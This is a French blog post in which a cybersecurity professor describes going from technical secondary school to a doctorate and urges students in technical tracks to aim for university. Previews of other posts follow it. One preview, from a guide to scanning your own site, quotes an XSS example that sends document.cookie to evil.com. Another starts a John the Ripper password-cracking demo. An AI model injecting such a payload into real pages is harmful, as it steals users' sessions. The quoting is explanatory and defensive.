Accéder au contenu principal

De la technique de transition à l’université : j’y suis arrivé, tu peux le faire aussi

 

En Belgique, on entend encore trop souvent que seuls les élèves du général peuvent réussir à l’université. Que si tu fais de la technique, tu es « condamné » à des études plus courtes, à des ambitions limitées.
Moi, je suis là pour te dire que c’est faux.

J’ai commencé mon parcours dans l’enseignement technique de transition. À l’époque, certains pensaient que je faisais un choix par défaut. Ce qu’ils ne voyaient pas, c’est que j’apprenais autrement. Que ce que je faisais avait du sens. Que j’aimais comprendre comment les choses fonctionnent, les manipuler, expérimenter.

📚 Le début d’un chemin, pas la fin

Ce n’était pas le chemin le plus valorisé, mais c’était le mien. Et ce chemin m’a mené loin.

Après la technique, j’ai poursuivi à l’université. J’ai obtenu un doctorat. J’ai enseigné, dirigé des projets de recherche internationaux, conseillé des gouvernements. J’ai été professeur d’universitéexpert en cybersécuritéWallon de l’annéeconsultant pour la Défense, l’ESA, la Commission européenne

Ce que je veux que tu comprennes, c’est que rien dans mon parcours n’était écrit à l’avance. Je n’ai jamais eu de passe-droit. Je me suis battu. Et j’ai réussi, parce que j’étais motivé, curieux, et que j’avais appris à travailler dur dès le secondaire.

✊ Tu n’es pas ton bulletin

Si tu es en technique aujourd’hui, et qu’on te dit que l’unif, « ce n’est pas pour toi », ne les écoute pas.
Tu as le droit d’essayer, le droit de rêver plus grand, et surtout le droit de réussir.

Ce n’est pas la filière qui fait la personne. Ce sont tes efforts, ta passion, ton envie d’avancer qui feront la différence.

Tu n’es pas ton école. Tu es ce que tu fais de ton potentiel.

🧭 Parents, enseignants, société : changeons de regard

Arrêtons de classer les élèves comme s’ils entraient dans des cases. L’enseignement technique n’est pas une voie de relégation. Il forme des esprits pratiques, capables, inventifs. Des jeunes qui savent ce qu’est la réalité, et qui souvent, n’ont rien à prouver — sauf qu’ils peuvent réussir aussi bien que les autres, voire mieux.

Encourageons-les. Accompagnons-les. Donnons-leur les moyens de viser haut.

🌟 En conclusion

Je m’appelle Axel Legay. J’ai fait mes études secondaires en technique de transition.
Je suis devenu professeur, docteur, chercheur international, expert reconnu.
Et je suis fier de mon parcours.

Alors toi aussi, sois fier du tien.
L’université, le succès, les projets ambitieux : ils sont à ta portée.

N’écoute pas ceux qui doutent de toi.
Prouve-leur qu’ils avaient tort.

Mon parcours: Axel Legay | LinkedIn

Mes compétences: legayconsulting.eu

Commentaires

Posts les plus consultés de ce blog

🔓 Peut-on vraiment "craquer" un mot de passe ? Une démonstration pas à pas 👇 Ce qu’on va faire Dans cet article, on montre concrètement comment un outil gratuit (présent dans Kali Linux) peut retrouver un mot de passe simple en quelques secondes. Mais on va aussi voir pourquoi un mot de passe complexe bloque toute attaque — et comprendre pourquoi. 🛠️ Les outils nécessaires On utilise un outil connu des experts cybersécurité : John the Ripper (inclus dans Kali Linux, utilisé pour les tests d’audit de mots de passe). John ne "pirate" pas un système en ligne. Il teste des mots de passe chiffrés en local , comme s’il avait volé un fichier de mots de passe (un hash). Cela simule ce qui se passe quand un hacker récupère une base de données de mots de passe cryptés . ✅ Étape 1 – Créer un mot de passe simple et le chiffrer On va créer un mot de passe : bonjour123 Puis on le chiffre avec cette commande : echo -n "bonjour123" | openssl passwd -...
Introduction au Machine Learning avec Python : Votre Premier Modèle IA de A à Z L'intelligence artificielle, souvent associée à des concepts abstraits et complexes, devient accessible grâce à Python. Aujourd’hui, vous allez découvrir comment créer un modèle de machine learning qui apprend à prédire si un passager du Titanic a survécu ou non. Ce projet concret vous donnera une vraie compréhension de ce qu’est l’IA appliquée. Étape 1 : Comprendre les données et le rôle de df Dans ce tutoriel, nous utilisons un jeu de données très célèbre : celui du Titanic. Chaque ligne représente un passager, avec des colonnes comme son âge, son sexe, sa classe dans le bateau, le prix payé pour son billet, et surtout, s’il a survécu ( Survived = 1 ) ou non ( Survived = 0 ). Quand on lit ce fichier CSV avec pandas , on stocke les données dans une structure appelée DataFrame , abrégée en df . Un DataFrame est un tableau à deux dimensions : les colonnes sont les variables (âge, sexe…), et ch...
🔐 Scanner son propre site web pour détecter les vulnérabilités : un guide complet pour débutants et curieux de cybersécurité 🧭 Pourquoi ce guide ? Internet est une vitrine. Et comme toute vitrine, elle peut être brisée. Un site web non sécurisé peut être : défiguré (defacement) utilisé pour héberger du code malveillant piraté pour voler des données utilisateurs utilisé comme relais pour des campagnes de phishing 👉 Pourtant, 80 % des failles exploitées aujourd’hui sont connues et évitables . Dans cet article, je vous montre comment scanner votre propre site pour détecter les vulnérabilités les plus courantes. 🚨 Exemples concrets d'attaques fréquentes 1. XSS (Cross-Site Scripting) But : injecter du JavaScript malveillant dans une page web. Exemple : <script>fetch('https://evil.com/steal?cookie=' + document.cookie)</script> Résultat : vol de session, redirection ou infection. 2. Exposition de fichiers sensibles But : accéder à des fich...